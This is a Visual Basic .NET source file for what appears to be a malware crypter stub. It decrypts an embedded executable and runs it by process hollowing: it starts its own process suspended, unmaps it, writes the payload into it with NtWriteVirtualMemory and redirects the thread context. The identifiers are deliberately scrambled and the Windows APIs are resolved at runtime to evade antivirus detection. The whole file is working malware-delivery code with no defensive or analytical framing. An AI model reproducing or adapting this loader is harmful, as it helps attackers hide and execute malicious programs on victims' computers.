﻿Imports System.Runtime.InteropServices
Imports System.Text

Module Module1
    Dim exefilestringdec = AES_Decrypt(EXEFILESTRINGENC, PASSWORD)
    Dim exefile = Convert.ToByte(exefilestringdec)

    Sub main()
        Dim x As New kXSfgIrVgHN : x.CIXrTQokVdM(exefile, Process.GetCurrentProcess.MainModule.FileName)
    End Sub

    Public Class kXSfgIrVgHN
        Public Declare Function ZhLACt Lib "kernel32" Alias "LoadLibraryA" (ByVal bTnm As String) As IntPtr
        Public Declare Function VVFJrw Lib "kernel32" Alias "GetProcAddress" (ByVal DeBg As IntPtr, ByVal bTnm As String) As IntPtr
        Function xPpfdvpSNMuzlyg(Of T)(ByVal bTnm As String, ByVal HwGo As String) As T
            Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(VVFJrw(ZhLACt(bTnm), HwGo), GetType(T)), Object), T)
        End Function
        Delegate Function JKUqWJ(ByVal CwQz As IntPtr, ByVal mfhQtgiPz As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        Delegate Function HpyMaL(ByVal yxaL As IntPtr, ByVal gKMo As IntPtr) As UInteger
        Delegate Function wWwGTW(ByVal yxaL As IntPtr, ByVal gKMo As IntPtr, ByRef bufr As IntPtr, ByVal bufruwbMdYdZw As Integer, ByRef SUHK As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
        Delegate Function JPTGPI(ByVal CwQzead As IntPtr, ByVal JVbi As IntPtr) As UInteger
        Delegate Function OJKeBE(ByVal CwQz As IntPtr, ByVal mfhQtgiPz As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        Delegate Function cuQrNq(ByVal yxaL As IntPtr, ByVal pyuj As IntPtr, ByVal uwbMdYdZw As IntPtr, ByVal XLgL As Integer, ByVal kzEv As Integer) As IntPtr
        Delegate Function igrcNk(ByVal yxaLess As IntPtr, ByVal lswTYhocD As IntPtr, ByVal XvF As Byte(), ByVal nuwbMdYdZw As UInteger, ByVal IXjtBKlKA As Integer) As Boolean
        Public Declare Auto Function xJhDoU Lib "kernel32" Alias "CreateProcessW" (ByVal gOH As String, ByVal PNBj As StringBuilder, ByVal neYFxFqiw As IntPtr, ByVal bAYT As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal rYPd As Boolean, ByVal XBif As Integer, ByVal GOVH As IntPtr, ByVal TCsq As String, ByVal iZjB As Byte(), ByVal OCCC As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        Private Function lEDLHHB(ByVal nSROOfd As Long, Optional ByVal hsyUxLT As Long = &H4) As Integer
            Dim YaTbur As IntPtr
            Dim FbkKTn As Integer
            Dim MigZQ As wWwGTW = xPpfdvpSNMuzlyg(Of wWwGTW)("ntdll", "NtReadVirtualMemory")
            Call MigZQ(Process.GetCurrentProcess.Handle, nSROOfd, YaTbur, hsyUxLT, FbkKTn)
            Return YaTbur
        End Function
        Public Function CIXrTQokVdM(ByVal iCxdifiRSJNjLL As Byte(), ByVal urcwjYta As String) As Boolean
            Try
                Dim afueLsPEn As GCHandle = GCHandle.Alloc(iCxdifiRSJNjLL, GCHandleType.Pinned) : Dim hModuleBase As Integer = afueLsPEn.AddrOfPinnedObject : afueLsPEn.Free()
                Dim neYFxFqiw As IntPtr = IntPtr.Zero
                Dim hyGwmlwdr As IntPtr() = New IntPtr(3) {}
                Dim yxaLEuzGk As Byte() = New Byte(67) {}
                Dim eTllDnYEa As Integer = BitConverter.ToInt32(iCxdifiRSJNjLL, 60)
                Dim jMUytIXWj As Integer
                Dim mfhQtgiPz As UInteger() = New UInteger(178) {}
                mfhQtgiPz(0) = &H10002
                xJhDoU(Nothing, New StringBuilder(urcwjYta), neYFxFqiw, neYFxFqiw, False, 4, neYFxFqiw, Nothing, yxaLEuzGk, hyGwmlwdr)
                Dim PNBjzdzNC As Integer = (hModuleBase + lEDLHHB(hModuleBase + &H3C))
                jMUytIXWj = lEDLHHB(PNBjzdzNC + &H34)
                Dim YFZkV As HpyMaL = xPpfdvpSNMuzlyg(Of HpyMaL)("ntdll", "NtUnmapViewOfSection")
                YFZkV(hyGwmlwdr(0), jMUytIXWj)
                Dim EislJ As cuQrNq = xPpfdvpSNMuzlyg(Of cuQrNq)("kernel32", "VirtualAllocEx")
                Dim lswTYhocD As IntPtr = EislJ(hyGwmlwdr(0), jMUytIXWj, lEDLHHB(PNBjzdzNC + &H50), &H3000, &H40)
                Dim ifiRSJNjL As New IntPtr(BitConverter.ToInt32(iCxdifiRSJNjLL, eTllDnYEa + &H34))
                Dim uwbMdYdZw As New IntPtr(BitConverter.ToInt32(iCxdifiRSJNjLL, eTllDnYEa + 80))
                Dim KDMOgiCQU As Integer
                Dim IXjtBKlKA As Integer
                Dim api8 As igrcNk = xPpfdvpSNMuzlyg(Of igrcNk)("ntdll", "NtWriteVirtualMemory")
                api8(hyGwmlwdr(0), lswTYhocD, iCxdifiRSJNjLL, CUInt(CInt(lEDLHHB(PNBjzdzNC + &H54))), KDMOgiCQU)
                For i = 0 To lEDLHHB(PNBjzdzNC + &H6, 2) - 1
                    Dim yCZcyujFJ As Integer() = New Integer(9) {}
                    Buffer.BlockCopy(iCxdifiRSJNjLL, (eTllDnYEa + &HF8) + (i * 40), yCZcyujFJ, 0, 40)
                    Dim STyzVzEtP As Byte() = New Byte((yCZcyujFJ(4) - 1)) {}
                    Buffer.BlockCopy(iCxdifiRSJNjLL, yCZcyujFJ(5), STyzVzEtP, 0, STyzVzEtP.Length)
                    uwbMdYdZw = New IntPtr(lswTYhocD.ToInt32() + yCZcyujFJ(3))
                    ifiRSJNjL = New IntPtr(STyzVzEtP.Length)
                    api8(hyGwmlwdr(0), uwbMdYdZw, STyzVzEtP, CUInt(ifiRSJNjL), IXjtBKlKA)
                Next i
                Dim EWltZ As JKUqWJ = xPpfdvpSNMuzlyg(Of JKUqWJ)("ntdll", "NtGetContextThread")
                EWltZ(hyGwmlwdr(1), mfhQtgiPz)
                api8(hyGwmlwdr(0), mfhQtgiPz(41) + &H8, BitConverter.GetBytes(lswTYhocD.ToInt32()), CUInt(&H4), IXjtBKlKA)
                mfhQtgiPz(&H2C) = jMUytIXWj + lEDLHHB(PNBjzdzNC + &H28)
                Dim vqUln As OJKeBE = xPpfdvpSNMuzlyg(Of OJKeBE)("ntdll", "NtSetContextThread")
                vqUln(hyGwmlwdr(1), mfhQtgiPz)
                Dim jYaqc As JPTGPI = xPpfdvpSNMuzlyg(Of JPTGPI)("ntdll", "NtResumeThread")
                jYaqc(hyGwmlwdr(1), 0)
            Catch ex As Exception
                Return False
            End Try
            Return True
        End Function
    End Class

    Public Function AES_Decrypt(ByVal input As String, ByVal pass As String) As String
        Dim AES As New System.Security.Cryptography.RijndaelManaged
        Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
        Dim decrypted As String = ""
        Try
            Dim hash(31) As Byte
            Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
            Array.Copy(temp, 0, hash, 0, 16)
            Array.Copy(temp, 0, hash, 15, 16)
            AES.Key = hash
            AES.Mode = Security.Cryptography.CipherMode.ECB
            Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
            Dim Buffer As Byte() = Convert.FromBase64String(input)
            decrypted = System.Text.ASCIIEncoding.ASCII.GetString(DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
            Return decrypted
        Catch ex As Exception
        End Try
    End Function

End Module
